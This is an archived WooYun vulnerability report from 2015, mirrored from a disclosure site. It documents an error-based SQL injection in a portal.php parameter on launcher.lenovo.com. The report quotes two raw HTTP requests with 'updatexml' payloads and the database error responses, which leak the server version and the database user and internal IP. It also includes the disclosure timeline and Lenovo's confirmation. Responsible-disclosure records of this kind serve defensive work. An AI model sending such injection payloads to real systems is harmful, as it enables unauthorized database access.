乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-17: 细节已通知厂商并且等待厂商处理中 2015-03-17: 厂商已经确认,细节仅向厂商公开 2015-03-27: 细节向核心白帽子及相关领域专家公开 2015-04-06: 细节向普通白帽子公开 2015-04-16: 细节向实习白帽子公开 2015-05-01: 细节向公众公开
launcher.lenovo.com
GET /launcher//portal.php?mod=material&cid=15+and+updatexml(1,version(),1)&selectedIconId=clock&version=4 HTTP/1.1User-Agent: Mozilla/5.0 Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5X-Requested-With: XMLHttpRequestCache-Control: no-cacheHost: launcher.lenovo.comAccept-Encoding: gzip, deflat<h1>Discuz! Database Error</h1><div class='info'>(1105) XPATH syntax error: '.62-enterprise-commercial-advanc'<div class="sql">SELECT * from theme_publicmaterial WHERE proid = 1 AND attid = 175 AND sortid= 15 and updatexml(1,(version()),1)</div></div>
GET /launcher//portal.php?mod=material&cid=15+and+updatexml(1,user(),1)&selectedIconId=clock&version=4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5X-Requested-With: XMLHttpRequestCache-Control: no-cacheHost: launcher.lenovo.comAccept-Encoding: gzip, deflate<div id="container"><h1>Discuz! Database Error</h1><div class='info'>(1105) XPATH syntax error: '@172.17.116.12'<div class="sql">SELECT * from theme_publicmaterial WHERE proid = 1 AND attid = 175 AND sortid= 15 and updatexml(1,user(),1)</div></div>
危害等级:高
漏洞Rank:12
确认时间:2015-03-17 17:19
感谢对联想安全的贡献!
暂无
